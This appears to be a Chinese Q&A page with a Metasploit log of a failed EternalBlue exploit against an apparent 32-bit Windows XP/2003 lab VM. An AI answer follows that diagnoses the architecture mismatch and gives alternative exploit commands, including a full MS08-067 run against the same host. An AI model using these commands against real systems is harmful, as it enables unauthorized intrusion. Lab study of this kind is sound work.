msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
时间: 2025-03-21 19:03:41 浏览: 93
<think>好的,我现在需要帮助用户分析他们提供的渗透测试过程,并解释为什么攻击失败。首先,用户在使用Metasploit的永恒之蓝漏洞(ms17_010_eternalblue)进行攻击时遇到了问题,最终没有成功创建会话。让我逐步拆解整个过程,找出可能的原因。
首先,用户一开始在msf6的漏洞模块下执行了nmap -O 192.168.200.129。从nmap的结果来看,目标主机开放了多个端口,包括445(microsoft-ds),这通常是SMB服务使用的端口,而永恒之蓝漏洞正是利用SMB协议的。所以用户正确地将目标指向了这个端口。nmap的操作系统检测结果显示目标可能运行的是Windows XP SP2或Windows Server 2003,这些系统都是32位的。这一点很重要,因为后续的漏洞利用是否支持32位系统会直接影响结果。
接下来,用户设置了rport为445,这是正确的,因为SMB服务通常在此端口监听。然后执行run开始攻击。根据输出,Metasploit首先使用辅助模块scanner/smb/smb_ms17_010进行漏洞检查,确认目标存在漏洞。这里显示目标系统是Windows 5.1 x86,即32位的Windows XP或Server 2003。然而,问题出现在最后一步:模块报告“Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets”,说明该漏洞利用模块仅支持64位系统,而目标系统是32位的,因此攻击被中止。
现在需要确认几个关键点:
1. Metasploit的ms17_010_eternalblue模块是否确实不支持32位目标?查阅文档或模块信息,确认其目标架构。根据错误信息,模块仅支持x64,所以可能该模块设计时只针对64位系统,比如Windows 7或更高版本,而用户的目标是较旧的32位系统。
2. 是否存在针对32位系统的永恒之蓝漏洞利用模块?可能用户需要切换另一个模块,或者调整参数。例如,有些情况下可能需要手动设置目标类型,但该模块可能没有包含32位的目标配置。
3. 是否有其他模块可用?比如,检查是否有其他相关漏洞利用模块适用于32位系统。例如,可能使用另一个利用程序,或者同一个模块的不同设置。
此外,用户可能忽略了在设置漏洞利用时的目标选项。在Metasploit中,某些模块允许使用“show targets”命令查看支持的目标系统,然后使用“set target <编号>”来指定。但根据错误信息,模块本身可能不支持32位,因此即使尝试设置目标也可能无效。
解决方案可能包括:
- 检查是否有更新版本的模块支持32位系统,或者寻找替代的利用模块。
- 如果目标确实是32位且无法更改,可能需要使用其他漏洞或方法进行攻击,例如使用不同的漏洞利用,或者结合其他攻击手法。
- 用户可能需要确认目标系统的确切版本,是否有可能误判。比如,虽然nmap检测为32位,是否有可能实际是64位?但根据输出中的OS CPE,显示的是Windows XP SP2或2003,这两个系统通常都是32位的。
总结问题根源:用户使用的Metasploit模块仅支持64位系统,而目标为32位,导致攻击失败。需要调整利用模块或选择其他适合32位系统的攻击途径。</think>以下是逐步分析与解决方案:
1. **漏洞检测阶段**
- 使用`nmap -O`确认目标IP开放端口及操作系统:
$$ \text{目标系统为Windows XP SP2或Server 2003(32位)} $$
- 关键端口`445/tcp`开放,符合永恒之蓝漏洞利用条件。
2. **漏洞验证阶段**
- Metasploit的`smb_ms17_010`检测确认目标存在漏洞:
$$ \text{主机状态:VULNERABLE} $$
- 但系统架构检测为`x86 (32-bit)`,与模块要求冲突。
3. **攻击失败原因**
- 错误信息明确提示:
$$ \text{This module only supports x64 (64-bit) targets} $$
- 当前模块`ms17_010_eternalblue`仅支持64位系统,无法攻击32位目标。
4. **解决方案**
- **方案1:更换利用模块**
- 查找支持32位系统的永恒之蓝利用模块。例如,某些旧版模块可能兼容,但需验证有效性。
- 在Metasploit中尝试以下命令:
```bash
search eternalblue
# 检查其他模块是否支持32位(例如 auxiliary/admin/smb/ms17_010_command)
```
- **方案2:手动指定目标参数(若模块支持)**
- 使用`show targets`查看模块支持的目标列表:
```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
```
- 若列表不含32位选项,则此路不通。
- **方案3:使用其他漏洞利用**
- 针对Windows XP/2003的其他漏洞(如MS08-067):
```bash
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.200.129
run
```
5. **补充建议**
- **验证目标架构准确性**:
使用`nmap -sV --script smb-os-discovery 192.168.200.129`进一步确认系统信息。
- **更新Metasploit框架**:
确保模块为最新版本,可能存在新增的32位支持。
**总结**:当前失败原因是模块与目标架构不匹配。需更换利用模块或调整目标系统选择。
阅读全文
相关推荐














